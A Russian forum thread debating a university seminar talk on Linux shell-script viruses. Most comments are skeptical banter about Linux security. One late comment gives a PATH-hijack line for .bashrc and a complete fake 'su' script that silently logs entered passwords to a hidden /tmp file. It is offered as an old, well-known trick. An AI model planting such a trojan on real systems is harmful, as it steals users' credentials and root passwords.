LINUX.ORG.RU
ФорумTalks

Доклады специалистов кафедры 12 НИЯУ МИФИ. «Скрипт-вирусы Linux».


0

1

Ъ

Серия семинаров "Проблемы информационной безопасности". Доклады специалистов кафедры 12 НИЯУ МИФИ. "Скрипт-вирусы Linux".

Отмечалась ошибочность точки зрения, согласно которой скрипт-вирусы не могут получить в системе привилегированных прав, а значит, не способны причинить существенный вред. Приведены результаты исследования механизмов функционирования скрипт-вирусов командных интерпретаторов ОС семейства UNIX.

Краткое изложение доклада

Ъ

...Антивирусные продукты в большинстве своем ориентированы на отражение атак злоумышленников извне и не рассчитаны на то, что атака может последовать со стороны доверенного для системы пользователя...
...В настоящее время разработчиками антивирусных программ все большее внимание уделяется защите тех компонентов, атаки на которые фиксируются чаще. Компоненты систем, атаки на которые зафиксированы не были, не защищаются. Об уязвимостях некоторых компонентов принято умалчивать, чтобы создать в коммерческих целях псевдо защищенный образ программного продукта.
    Тема атак скрипт-вирусов для командных интерпретаторов на ОС семейства UNIX в настоящее время поднимается редко. Существование скрипт-вирусов рядом экспертов в области компьютерной вирусологии отрицается как факт. Существуют утверждения, что подобные вирусы являются гипотетической угрозой безопасности.
Скрипт-вирусы – это вирусы, создаваемые на интерпретируемых языках программирования. У современных создателей антивирусных систем накоплен богатый опыт борьбы с вирусами, написанными на исполняемых языках программирования. Опыт борьбы со скрипт-вирусами под ОС семейства UNIX отсутствует. Причиной этому можно назвать нежелание вкладывать усилия и финансы в исследование нового вида вирусов, которые не столь распространены....
...Скрипт-вирусы недооцениваются по причине ошибочного мнения, что эти вирусы не могут получить в системе привилегированных прав, а значит, не способны причинить существенный вред. Данное заблуждение связано с заявлениями антивирусных экспертов, которые большую часть времени работают с вирусами, написанными на языке Assembler...

[!]В диссертации рассматривается класс скрипт-вирусов – скрипт-вирусы на командном языке Shell...
Приводятся результаты исследования механизмов функционирования скрипт-вирусов командных интерпретаторов ОС семейства UNIX [!]

Почитать бы саму работу. И люди защищаются...

> Скрипт-вирусы недооцениваются по причине ошибочного мнения, что эти вирусы не могут получить в системе привилегированных прав

тут какбы налицо ошибочное мнение, что скрипты могут получить в системе привелигированные права...

name_no ★★ ()

почитать работу и скрипто-вирусы запустить хочу я.

RedPossum ★★★★★ ()

Основная идея доклада в том, что если из-под рута запустить полученый от неизвестного отправителя скринсейвер, то будет плохо?

//по ссылке не ходил

KDE41user ()

Какие они все же идиоты. НИУЯ вперде.

Данное заблуждение связано с заявлениями антивирусных экспертов, которые большую часть времени работают с вирусами, написанными на языке Assembler...

Убило

different_thing ()

Ну всё, пора писать обфускатор, а то однострочники работать перестанут

Cancellor ★★★★☆ ()

...Скрипт-вирусы недооцениваются по причине ошибочного мнения, что эти вирусы не могут получить в системе привилегированных прав, а значит, не способны причинить существенный вред. Данное заблуждение связано с заявлениями антивирусных экспертов, которые большую часть времени работают с вирусами, написанными на языке Assembler...

А как, интересно, из скрипта получить привелигированные права в системе? Я что-то пропустил и это теперь стало запросто возможно? =) И экспертов по вирусам на ассемблере приплели... По ссылке не ходил.

tim239 ()
Ответ на: комментарий от different_thing

Это да. Мне например нет разницы, потерять весь / или только /home, потому что /home мне гораздо дороже чем остальной /.

tim239 ()
Ответ на: комментарий от name_no

>тут какбы налицо ошибочное мнение, что скрипты могут получить в системе привелигированные права...
А локальные уязвимости, коих полно?

anotheranonymous ()
Ответ на: комментарий от tim239

Мне например нет разницы, потерять весь / или только /home, потому что у меня всегда есть бэкапы на резервном диске.

Исправлено во имя великой справедливости.

GotF ★★★★★ ()

Что то меня терзают смутные сомнения что «вирусами» они назвали скрипты типа однострочника на Перле, а не настоящие вирусы.

Alex_A_V ★★ ()
Ответ на: комментарий от tim239

Смысл ограничения прав не в том, чтобы защитить систему от стирания /, а в том, чтобы не позволить вирусу (а точнее - червю) превращать компьютеры в заражающие боты.

А если червь не может экспоненциально наращивать свой бот-нет, то он не сможет распостраниться достаточно широко, чтобы предоставлять опасность для вашего / или /home.

ddos3 ()

Интересно как вирусы выживают при врубленном selinux Или таки не выживают?

DNA_Seq ★★☆☆☆ ()
Ответ на: комментарий от anotheranonymous

>Продолжай себя тешить красноглазыми сказками о неуязвимости линукса, ага.

ути-пути какой толстячOк - метанизатор луж :)

sS ★★★★★ ()

Серия семинаров «Проблемы информационной безопасности». Доклады специалистов кафедры 12 НИЯУ МИФИ. "Скрипт-вирусы Linux"

ППЦ нарожали «специалистов» ... они небось и не догадываются что «Linux это ядро» (С)

sS ★★★★★ ()
Ответ на: комментарий от KDE41user

Основная идея доклада в том, что если из-под рута запустить полученый от неизвестного отправителя скринсейвер, то будет плохо?

Тут тебе никто не ответит, ибо ЛОР-аналитеги же! Они сидят в криокамере и считают, что главная ценность юзера - хомяк.

А если ты спросишь про скриптовую атаку на браузер с целью выудить твои пароли от учетки Гугла или вконтактика (что куда ценнее накаченной порнухи) или про возможность сделать из твоей машины бота, то тут тебе тоже ничего не ответят. Потому что ЛИНУКС НЕУЯЗВИМ, а Касперский пишет вирусы.

the_warlick ()
Ответ на: комментарий от the_warlick

>А если ты спросишь про скриптовую атаку на браузер с целью выудить твои пароли от учетки Гугла или вконтактика (что куда ценнее накаченной порнухи) или про возможность сделать из твоей машины бота, то тут тебе тоже ничего не ответят.


ПРУФ

а что про песочницы/виртуальные машины не слыщали?

Windos7 ()
Ответ на: комментарий от the_warlick

Это очень просто проверить. Берем чей-нибудь хост, и если в течении недели на нём не удается запустить ничего вредоносного, паникеры опять слили. Юзеров за уязвимость не считаем.

arknir ()
Ответ на: комментарий от Den0k

> формате .DOC

Ничего не попишешь, мне вот свою дипломную работу, набранную в LaTeX, тоже в doc пришлось конвертить, таковы требования.

ufw ()
Ответ на: комментарий от Windos7

а что про песочницы/виртуальные машины не слыщали?

Да-да, а еще есть НоСкрипт для Фаерфокс.

Только вот наверное, когда очередной хомячок или блонда ставит (или им ставят) Убунту или Cecю на ноутбук, то они первым делам красноглазят с песочницей и тут же ставят НоСКрипт. А потом куча воплей - кто спер мою учетку от вконтактика, Линукс же неуязвим!

the_warlick ()
Ответ на: комментарий от arknir

Юзеров за уязвимость не считаем.

Т.е. ты считаешь, что если юзер зашел на сайт, а ему там впарили скрипт через браузер, то юзер виноват, потому что не красноглазил в песочнице и на ставил НоСкрипт?

the_warlick ()
Ответ на: комментарий от the_warlick

>Только вот наверное, когда очередной хомячок или блонда ставит (или им ставят) Убунту или Cecю на ноутбук, то они первым делам красноглазят с песочницей и тут же ставят НоСКрипт. А потом куча воплей - кто спер мою учетку от вконтактика, Линукс же неуязвим!

Я хомячок дуалбутщик

Юзаю Оперу, по дефолту все жавы/флешы для неизвестных сайтов выключены

Мне начинать боятся?

Windos7 ()
Ответ на: комментарий от Windos7

Юзаю Оперу, по дефолту все жавы/флешы для неизвестных сайтов выключены

Я тебе про хомячков без НоСкрипта и отключалок, а ты мне про отключенные скрипты.

the_warlick ()
Ответ на: ГДЕ ПРУФ? от Windos7

хотелось бы увидеть сайт, с такой возможностью

Читай ЛОР. Давно обсуждалось, что уже есть веб-сайты, которые при заходе на них определяют твою ОС, браузер и суют то (тот скрипт), что тебе подойдет с учетом этих параметров и уязвимостей.

the_warlick ()
Ответ на: комментарий от sS

Ну то есть пруфа как обычно не будет ? ;)

Ну то есть пруфа как обычно не будет, что через браузер в Линпсе нельзя потырять кукисы и пароли от учеток, да?

the_warlick ()

А что это за хрень такая НИЯУ - научно-исследовательский ядерный университет? Распилочный клон ИЯИ?

И с какого рожна они занимаются проблемами информационной безопасности?

fool_anon ()
Ответ на: комментарий от the_warlick

>Читай ЛОР. Давно обсуждалось, что уже есть веб-сайты, которые при заходе на них определяют твою ОС, браузер и суют то (тот скрипт), что тебе подойдет с учетом этих параметров и уязвимостей.


Иными словами данные сайты используют уязвимости браузеров а не ОС в которых их юзают?

Windos7 ()
Ответ на: комментарий от anon_666

>+ видел такую хрень, которая из браузера запускала calc.exe под вендой, так что..

Эта хрень называется ActiveX и является самой кошерно-православной дырой всех времен и народов

Specter ()
Ответ на: комментарий от anon_666

Ставишься плагином (COM) и юзаешь пользовательское окружение. Да, в IE всё так...

helios ★★★★★ ()
Ответ на: комментарий от anotheranonymous

> Продолжай себя тешить красноглазыми сказками о неуязвимости линукса, ага.
Единственная уязвимость в юниксовом юзерспейсе это прокладка между стулом и клавиатурой. Зато очень очень очень долговечная и неисправимая by design.

Lumi ★★★★★ ()
Ответ на: комментарий от Alex_A_V

Это ты про те роутеры, которые выпускали с открытой наружу админкой и заводским дефолтным паролем? Так к безопасности линукса это отношения не имеет.

С другой стороны, эта история показывает, что вирусню пишут под все, до чего можно легко добраться, и в очередной раз опровергает гипотезу, что под линуксы нет вирусни только потому что линуксов мало.

ddos3 ()
Ответ на: комментарий от sS

> ППЦ нарожали «специалистов» ... они небось и не догадываются что «Linux это ядро» (С)

Может имелись в виду скрипты в /usr/src/linux/scripts/ ?

Lumi ★★★★★ ()
Ответ на: комментарий от fool_anon

>И с какого рожна они занимаются проблемами информационной безопасности?

Вообще-то, в МИФИ уже давно есть факультет безопасности)) Вопрос: а работу-то кто-нить читал? Или в стиле: я не смотрел, но гамно?

CALLIKO ()
Ответ на: комментарий от CALLIKO

Тут еще фича может быть вот в чем: безопасность инфы на компах - это всего лишь часть общей теории безопасности, причем далеко не самая большая, а потому существует вероятность, что чел мог начать изучать тему безопасности в лине с началом написания этой работы)))

CALLIKO ()
Ответ на: комментарий от Lumi

>Может имелись в виду скрипты в /usr/src/linux/scripts/

Я думаю что они не догадываются об их существовании :)

sS ★★★★★ ()
Ответ на: комментарий от CALLIKO

>Вопрос: а работу-то кто-нить читал?

Ну прислали бы хоть авторефератик. Там за одну терминологию (если она в автореферате соответствует вышенамисанному) можно закопать соискателя.

sS ★★★★★ ()
Ответ на: комментарий от sS

Ну, вообще-то, я так понимаю, тут дело в том, что работу представляют не только для про - там может быть народ, который кроме венды ничо не видел, для которых консоль - это чОрный дОс (с). Вот и написан обзор так, чтобы домохозяйка догнала).

Иначе, блин, вопросы будут в стиле:

-Извините, я все понял, тока как полевые транзистры будут влиять на урожайность наших полей? (с)

CALLIKO ()
Ответ на: комментарий от melkor217

www.linux.org.ru/wiki/en/Фальшивый_логин тянет на вирус под линукс?

Ну это уже ближе к теме хотя там в самом начале сходу fail.

Подобная атака была описана ещё в «Яйце кукушки» х/з сколько лет назад (1986 год по моему или около того)

краткое описание трюка:

1) Крадётся пароль/логин пользователя от шела (про методы умалчиваем)

2) в .bashrc добавляется строка (чисто для примера)

export PATH=/tmp:$PATH

3)в /tmp (чисто для примера) складывается вот такой вот скрипт с незамысловатым именем su (rlogin, telnet, ssh, etc)

#!/bin/sh
SYSTEM="`/bin/uname`"
echo -n Password:
stty -echo
read password
stty echo
sleep 2
echo $1        >> /tmp/.10666.cron
echo $password >> /tmp/.10666.cron
if [ "$SYSTEM" = "Linux" ]; then
  echo Sorry.
fi
if [ "$SYSTEM" = "SunOS" ]; then
 echo su:   Sorry
fi
if [ "$SYSTEM" = "FreeBSD" ]; then
 echo Sorry.
fi
mv  /tmp/su /tmp/.10000.cron
ln  -s /bin/su  /tmp/su

Только это г мамонта к скрипт-вирусам имеет весьма опосредованное отношение.

Но попугать хомячков оно конечно сгодится :))

sS ★★★★★ ()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.